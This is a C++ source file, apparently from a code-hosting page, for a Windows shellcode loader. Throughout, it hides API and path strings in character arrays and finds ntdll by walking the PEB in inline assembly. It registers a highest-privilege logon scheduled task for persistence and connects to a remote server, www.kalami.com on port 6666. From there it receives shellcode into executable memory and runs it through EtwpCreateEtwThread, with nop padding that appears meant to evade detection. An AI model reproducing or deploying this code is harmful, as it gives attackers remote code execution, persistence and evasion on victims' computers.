234 lines
5.5 KiB
C++
234 lines
5.5 KiB
C++
#include <iostream>
|
|
#include <winsock2.h>
|
|
#include <ws2tcpip.h>
|
|
#include<errhandlingapi.h>
|
|
#include"../../struct/info.h"
|
|
#include <comdef.h>
|
|
#include <wincred.h>
|
|
#include <taskschd.h>
|
|
#pragma comment(lib, "taskschd.lib")
|
|
#pragma comment(lib, "comsupp.lib")
|
|
#pragma comment(lib, "credui.lib")
|
|
#pragma comment(lib, "ws2_32.lib")
|
|
|
|
typedef HANDLE (WINAPI* pEtwpCreateEtwThread)(PVOID lpStartAddress, PVOID lpParameter);
|
|
|
|
static MODIFY_DATA modify_data ={"www.kalami.com",6666,{0,}};
|
|
//static MODIFY_DATA modify_data = { "192.168.0.5",6666,{0,} };
|
|
SOCKET m_Socket = NULL;
|
|
ShellcodeStr* m_ShellcodeStr = NULL;
|
|
pEtwpCreateEtwThread EtwpCreateEtwThread;
|
|
|
|
void Init()
|
|
{
|
|
WSADATA wsaData;
|
|
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
|
|
exit(0);
|
|
|
|
|
|
|
|
HMODULE ntdll = 0;
|
|
HMODULE ket32 = 0;
|
|
_asm {
|
|
mov eax, fs: [0x18] ;
|
|
mov eax, [eax + 0x30];
|
|
mov eax, [eax + 0x0c];
|
|
mov eax, [eax + 0x0c];
|
|
mov eax, [eax];
|
|
mov ebx, dword ptr[eax + 0x18];
|
|
mov ntdll, ebx;
|
|
mov eax, [eax];
|
|
mov eax, dword ptr[eax + 0x18];
|
|
mov ket32, eax;
|
|
}
|
|
char etw[] = { 'E','t','w','p','C','r','e','a','t','e','E','t','w','T','h','r','e','a','d',0 };
|
|
EtwpCreateEtwThread = (pEtwpCreateEtwThread)GetProcAddress(ntdll, etw);
|
|
|
|
ITaskService* pService;
|
|
ITaskFolder* pRootFolder;
|
|
ITaskDefinition* pTask;
|
|
IRegistrationInfo* pRegInfo;
|
|
IPrincipal* pPrincipal;
|
|
ITaskSettings* pSettings;
|
|
IIdleSettings* pIdleSettings;
|
|
ITriggerCollection* pTriggerCollection;
|
|
ITrigger* pTrigger;
|
|
IActionCollection* pActionCollection;
|
|
IAction* pAction;
|
|
IExecAction* pExecAction;
|
|
IRegisteredTask* pRegisteredTask;
|
|
// 初始化 COM
|
|
HRESULT hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
|
|
// 设置 COM security levels.
|
|
hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, 0, NULL);
|
|
// 创建Task Service对象
|
|
hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pService);
|
|
// 连接到Task Service
|
|
hr = pService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
|
|
|
|
hr = pService->GetFolder(_bstr_t(L"\\"), &pRootFolder);
|
|
//首先创建任务定义对象,进行任务创建操作
|
|
hr = pService->NewTask(0, &pTask);
|
|
//接着设置注册信息
|
|
hr = pTask->get_RegistrationInfo(&pRegInfo);
|
|
char admin[] = { 'a','d','m','i','n','i','s','t','r','a','t','o','r',0 };
|
|
//作者
|
|
hr = pRegInfo->put_Author(_bstr_t(admin));
|
|
|
|
//设置主体信息
|
|
hr = pTask->get_Principal(&pPrincipal);
|
|
// 设置登陆类型
|
|
hr = pPrincipal->put_LogonType(TASK_LOGON_INTERACTIVE_TOKEN);
|
|
// 设置运行权限
|
|
hr = pPrincipal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);
|
|
//设置任务相关信息
|
|
hr = pTask->get_Settings(&pSettings);
|
|
hr = pSettings->put_StartWhenAvailable(VARIANT_TRUE);
|
|
hr = pSettings->get_IdleSettings(&pIdleSettings);
|
|
|
|
//创建触发器
|
|
|
|
hr = pTask->get_Triggers(&pTriggerCollection);
|
|
hr = pTriggerCollection->Create(TASK_TRIGGER_LOGON, &pTrigger);
|
|
//设置执行操作
|
|
hr = pTask->get_Actions(&pActionCollection);
|
|
hr = pActionCollection->Create(TASK_ACTION_EXEC, &pAction);
|
|
hr = pAction->QueryInterface(IID_IExecAction, (void**)&pExecAction);
|
|
char name[] = { 'C',':','\\','U','s','e','r','s','\\','P','u','b','l','i','c','\\','D','o','c','u','m','e','n','t','s','\\','0','0','0','0','.','e','x','e',0 };
|
|
hr = pExecAction->put_Path(_bstr_t(name));
|
|
//在ITaskFolder对象注册
|
|
hr = pRootFolder->RegisterTaskDefinition(_bstr_t("yyy"), pTask, TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(L""), &pRegisteredTask);
|
|
|
|
}
|
|
|
|
void Run()
|
|
{
|
|
HANDLE thread = EtwpCreateEtwThread(m_ShellcodeStr, m_ShellcodeStr);
|
|
WaitForSingleObject(thread, -1);
|
|
}
|
|
|
|
DWORD WINAPI WorkThread(PVOID p)
|
|
{
|
|
int len = 0;
|
|
BYTE buff[10 * 1024] = { 0 };
|
|
int nSize = 0;
|
|
|
|
do
|
|
{
|
|
nSize = recv(m_Socket, (CHAR*)buff, sizeof(buff), 0);
|
|
//接收出错跳出循环
|
|
if (nSize <= 0)
|
|
{
|
|
exit(0);
|
|
}
|
|
|
|
//接受的数据拷贝到结构当中
|
|
memcpy(((char*)m_ShellcodeStr) + len, buff, nSize);
|
|
len += nSize;
|
|
|
|
if (len == sizeof(ShellcodeStr))
|
|
{
|
|
memcpy(&m_ShellcodeStr->modify_data, &modify_data, sizeof(MODIFY_DATA));
|
|
}
|
|
|
|
} while (len != sizeof(ShellcodeStr));
|
|
|
|
Run();
|
|
|
|
return 0;
|
|
}
|
|
|
|
int main()
|
|
{
|
|
__asm {
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
}
|
|
Init();
|
|
m_Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
__asm {
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
}
|
|
if (m_Socket != INVALID_SOCKET)
|
|
{
|
|
__asm {
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
}
|
|
m_ShellcodeStr = (ShellcodeStr*)VirtualAlloc(0,sizeof(ShellcodeStr), MEM_COMMIT| MEM_RESERVE,0x40);
|
|
if (!m_ShellcodeStr)
|
|
exit(0);
|
|
|
|
for (size_t i = 0; i < sizeof(MODIFY_DATA); i++)
|
|
{
|
|
((PBYTE)&modify_data)[i] ^= 'a';
|
|
}
|
|
|
|
for (;;)
|
|
{
|
|
//域名转ip
|
|
addrinfo* info = { 0 };
|
|
if (getaddrinfo(modify_data.DNS, NULL, NULL, &info) != 0)
|
|
break;
|
|
__asm {
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
}
|
|
//填充连接结构
|
|
sockaddr_in ClientAddr;
|
|
ClientAddr = *((sockaddr_in*)info->ai_addr);
|
|
ClientAddr.sin_port = htons(modify_data.Port);
|
|
//开始连接
|
|
if (connect(m_Socket, (SOCKADDR*)&ClientAddr, sizeof(ClientAddr)) != SOCKET_ERROR)
|
|
{
|
|
break;
|
|
}
|
|
}
|
|
HANDLE thread = EtwpCreateEtwThread(WorkThread, &m_ShellcodeStr);
|
|
__asm {
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
}
|
|
char name[] = { 'n','b','c','l','a','s','s',0 };
|
|
int rt = send(m_Socket, name, sizeof(name), 0);
|
|
if (rt <= 0)
|
|
{
|
|
exit(0);
|
|
}
|
|
__asm {
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
nop
|
|
}
|
|
WaitForSingleObject(thread,-1);
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
|